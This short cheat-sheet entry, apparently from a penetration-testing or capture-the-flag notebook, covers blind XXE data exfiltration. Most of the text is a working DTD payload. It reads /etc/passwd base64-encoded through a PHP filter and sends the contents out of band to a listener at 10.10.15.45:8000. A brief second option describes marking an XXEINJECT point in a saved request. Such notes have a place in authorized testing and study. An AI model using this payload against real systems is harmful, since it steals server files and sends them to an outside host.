Blind Data Exfiltration

subl xxe.dtd
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % oob "<!ENTITY content SYSTEM 'http://10.10.15.45:8000/?content=%file;'>">

Option 2

First we need to save the request to blind.req

Then just edit the XML content and make sure to put the XXEINJECT

Last updated